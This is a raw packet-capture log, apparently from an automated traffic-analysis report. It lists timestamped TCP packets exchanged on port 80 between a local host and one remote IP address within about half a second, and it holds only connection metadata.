                                                                                                                                                                                  Nov 23, 2024 14:46:40.649640083 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.649660110 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.649682045 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.651734114 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.651781082 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.651796103 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.651825905 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.651842117 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.651849031 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.651878119 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.662049055 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.662103891 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.662113905 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.662168026 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.662194014 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.662237883 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.662252903 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.662270069 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.662277937 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.662317038 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.662334919 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.662348032 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.662379026 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.662420034 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.662432909 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.662448883 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.662461996 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.662473917 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.662482977 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.662493944 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.662506104 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.662512064 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.662532091 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.662547112 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.662585974 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.662697077 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.662707090 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.662724018 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.662735939 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.662741899 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.662755966 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.662766933 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.662775040 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.662787914 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.662825108 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.667840004 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.667860985 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.667881966 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.667887926 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.667911053 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.667917967 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.667934895 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.667943954 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.667964935 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.667980909 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.667988062 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.668024063 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.668041945 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.668055058 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.668077946 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.668724060 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.668771029 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.668831110 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.669830084 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.669872046 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.669986010 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.670901060 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.670938015 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.671106100 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.671952963 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.671993017 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.672080994 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.673027992 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.673077106 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.673134089 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.674124002 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.674169064 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.674233913 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.675170898 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.675252914 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.675276041 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.676856995 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.676918983 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.676992893 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.677347898 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.677385092 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.677458048 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.680660009 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.680823088 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.680869102 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.697065115 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.718563080 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.792274952 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.792412043 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.792481899 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.792908907 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.792982101 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.793024063 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.793561935 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.793626070 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.793659925 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.794712067 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.794836044 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.794882059 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.818310976 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.818384886 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.818424940 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.818819046 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.818943024 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.818980932 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.819892883 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.820040941 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.820101023 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.820950985 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.821175098 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.821211100 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.822052002 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.822138071 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.822182894 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.823124886 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.823252916 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.823286057 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.824218035 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.824342012 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.824485064 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.825248003 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.825361967 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.825408936 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.826359034 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.826468945 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.826555967 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.827442884 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.827579975 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.827620983 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.828541040 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.828686953 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.828725100 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.829571962 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.829721928 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.829776049 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.830656052 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.830760956 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.830996037 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.831764936 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.832027912 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.832071066 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.832825899 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.832938910 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.832982063 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.833889008 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.833940029 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.833982944 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.834948063 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.835084915 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.835129023 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.836015940 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.836339951 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.836376905 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.837193966 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.837255955 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.837291002 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.838174105 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.838249922 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.838354111 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.839260101 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.839365005 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.839401960 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.840339899 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.840403080 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.840440035 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.841392994 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.841537952 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.841569901 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.842463017 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.842559099 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.843142986 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.843566895 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.843704939 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.843739033 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.844609022 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.844732046 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.844769001 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.845896006 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.845918894 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.845956087 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.846780062 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.846833944 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.846863985 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.847860098 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.847990990 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.848028898 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.848989010 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.849147081 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.849225044 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.850028038 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.850306988 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.850400925 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.851079941 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.851169109 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.851274967 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.852138042 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.852152109 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.852255106 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.853215933 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.853239059 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.853368044 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.854302883 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.854343891 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.854502916 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.854540110 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.855401993 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.855514050 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.855550051 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.856457949 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.856575966 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.856611967 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.857534885 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.857634068 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.857687950 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.858612061 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.859020948 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.859055996 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.859698057 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.859942913 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.859981060 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.860773087 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.860881090 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.860914946 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.861815929 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.861937046 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.861974001 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.862906933 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.863009930 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.863141060 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.863991022 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.864249945 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.864272118 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.864305973 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.865073919 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.865286112 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.865325928 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.866126060 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.866250038 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.866292000 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.867788076 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.867990971 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.868032932 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.868798018 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.869029999 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.869077921 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.869476080 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.869565010 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.869635105 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.870430946 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.870589018 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.870631933 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.984261036 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.984365940 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.984409094 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.984800100 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.984992981 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.985111952 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.985651970 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.985876083 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.985918045 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:40.986788034 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.986869097 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:40.986915112 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:41.010478020 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:41.010488987 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:41.010545015 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:41.010691881 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:41.010824919 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:41.010859013 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:41.011853933 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:41.011895895 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:41.011941910 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:41.012866020 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:41.012970924 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:41.013005018 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:41.013938904 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:41.014040947 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:41.014108896 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:41.015023947 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:41.015120983 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:41.015157938 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:41.015661001 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:41.016091108 CET8049744185.215.113.16192.168.2.4
